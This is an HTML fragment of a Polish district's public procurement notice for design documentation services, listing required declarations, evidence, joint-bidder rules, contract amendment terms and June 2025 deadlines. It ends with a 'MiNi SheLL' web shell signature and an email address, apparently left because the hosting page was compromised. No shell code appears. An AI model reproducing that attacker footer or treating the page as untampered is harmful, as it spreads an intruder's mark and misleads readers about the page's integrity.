potwierdzenia braku podstaw do wykluczenia z udziału w postępowaniu:<br/>a) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w<br/>zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego w Rozdziale VIII SWZ, o których mowa w:<br/>- art. 108 ust. 1 ustawy Pzp,<br/>- art. 109 ust. 1 pkt 4 ustawy Pzp<br/>- art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego, zgodnie ze wzorem stanowiącym Załącznika 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania warunków udziału w postępowaniu dot. zdolności technicznej lub zawodowej Zamawiający będzie żądał dostarczenia:<br/>a. wykazu usług – wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy – wzór stanowi załącznik nr 8 do SWZ.<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji usług objętych niniejszym postępowaniem wspólnie z innymi Wykonawcami powyższy wykaz musi dotyczyć usług, w których ten Wykonawca bezpośrednio uczestniczył.<br/>b. wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za przygotowanie dokumentacji projektowej wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do<br/>dysponowania tymi zasobami – wzór stanowi załącznik nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dla wszystkich części:<br/>Do oferty:<br/>1. Formularz ofertowy (w zależności dla danej części:<br/>część 1- wzór stanowi załącznik nr 3a<br/>część 2- wzór stanowi załącznik nr 3b<br/>część 3- wzór stanowi załącznik nr 3c<br/>część 4- wzór stanowi załącznik nr 3d<br/>część 5- wzór stanowi załącznik nr 3e<br/>2. Wykonawca zobowiązany jest złożyć wraz z ofertą oświadczenie (o którym mowa w art. 125 ust. 1 ustawy Pzp.)<br/>stanowiące wstępne potwierdzenie, że Wykonawca na dzień składania ofert nie podlega wykluczeniu oraz spełnia warunki<br/>udziału w postępowaniu, zgodnie ze wzorem stanowiącym załącznik nr 4 do SWZ.<br/>3. Oświadczenie, o którym mowa w ust. 1 składają odrębnie:<br/>- Wykonawca/każdy spośród Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>- Podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełniania warunków udziału w postępowaniu.<br/>Ponadto do oferty należy dołączyć :<br/>1.Zobowiązanie podmiotu udostępniającego zasoby, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na<br/>potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w przypadku gdy Wykonawca korzysta ze<br/>zdolności innych podmiotów na zasadach określonych w art. 118 ustawy. Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z<br/>oświadczeniem o którym mowa w pkt 1, także zobowiązanie podmiotu udostępniającego zasoby, zgodnie ze wzorem<br/>stanowiącym załącznik nr 5 do SWZ (jeśli dotyczy)<br/>2. Oświadczenie składane na podstawie art. 117 ust. 4 Pzp., z którego wynika, które usługi wykonają poszczególni<br/>Wykonawcy (dotyczy tylko Wykonawców wspólnie ubiegających się o zamówienie). W przypadku, wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w pkt 1 składa<br/>każdy z Wykonawców wspólnie ubiegających się o zamówienie (konsorcja/spółki cywilne). Oświadczenie to potwierdza brak<br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Oświadczenie Wykonawców wspólnie ubiegających się o zamówienie, zgodnie ze wzorem stanowiącym załącznik nr 6 do SWZ (jeśli dotyczy).<br/>3. Pełnomocnictwo do reprezentowania Wykonawcy. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia,<br/>zobowiązani się złożyć wraz z ofertą stosowne pełnomocnictwo – nie dotyczy spółki cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga:<br/>Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia oświadczenie, o którym mowa w pkt 1 Rozdział IX SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. Jednocześnie w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawca przedstawia wraz z oświadczeniem, o którym mowa powyżej także oświadczenie dot. art. 117 ust. 4 - załącznik nr 6 do SWZ (jeśli dotyczy).<br/>3. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia, o których mowa w ppkt 1.4. Rozdział VII SWZ, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z<br/>Wykonawców, którzy wykonają usługi, do realizacji których te zdolności są wymagane.<br/>4. W przypadku, o którym mowa w pkt. 3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Oświadczenie należy złożyć wg wymogów Załącznika nr 6 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym.<br/>5. Oświadczenie o którym mowa w pkt. 4 niniejszego Rozdziału sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach wydanych na podstawie art. 18 ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne (Dz. U. z 2024 r. poz. 1557), z zastrzeżeniem formatów, o których mowa w art. 66 ust. 1 ustawy, z uwzględnieniem rodzaju przekazywanych danych.<br/>6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są na wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt 8 Rozdział IX SWZ, przy czym podmiotowe środki dowodowe, o<br/>których mowa:<br/>a) w pkt. 8 ppkt 8.2. Rozdział IX SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku<br/>b) w pkt. 8 ppkt 8.1. Rozdział IX SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Umowa w sprawie zamówienia publicznego wymaga, pod rygorem nieważności, zachowania formy pisemnej.<br/>2. Projekt umowy stanowi Załącznik nr 2 do SWZ.<br/>3. Zamawiający dopuszcza - jeżeli uzna to za uzasadnione - możliwość zmiany ustaleń zawartej Umowy w stosunku do treści oferty Wykonawcy, w przypadkach o których mowa w art. 455 ustawy z dnia 11 września 2019r. Prawo Zamówień Publicznych (tekst jedn. Dz. U. z 2024r., poz. 1320), zgodnie z warunkami zawartymi w załączniku nr 2 do SWZ.<br/>4. Każda zmiana umowy musi być dokonana na piśmie w formie aneksu pod rygorem nieważności oraz wymaga zgody drugiej strony.<br/>4. Szczegółowe informacje dot. powyższych zmian umowy określone zostały w § 14 projektu umowy - załącznik nr 2 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-02 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://powiat-radomski.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-02 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> WYMAGANIA W ZAKRESIE ZATRUDNIENIA NA PODSTAWIE STOSUNKU PRACY, w okolicznościach, o których mowa w art. 95 oraz w zakresie zatrudnienia osób, o których mowa w art. 96 ust.2 pkt 2, jeżeli Zamawiający przewiduje takie wymagania:<br/>1.1 Zamawiający nie wymaga od Wykonawcy i podwykonawców obowiązku zatrudnienia przez Wykonawcę lub podwykonawcę na umowę o pracę osoby wykonującej czynności w zakresie realizacji przedmiotu zamówienia.<br/>1.2 Zgodnie z art. 12 ust 2 ustawy Prawo budowlane działalność obejmująca projektowanie może wykonywać osoba pełniąca samodzielną funkcję techniczną w budownictwie, którą mogą wykonywać wyłącznie osoby posiadające „uprawnienia budowlane”.<br/>2. Zgodnie z art. 100 ustawy Pzp Zamawiający wymaga, aby przedmiot zamówienia został zrealizowany z uwzględnieniem potrzeb wszystkich użytkowników, w tym zapewnienia dostępności dla osób niepełnosprawnych.

Creat By MiNi SheLL
Email: jattceo@gmail.com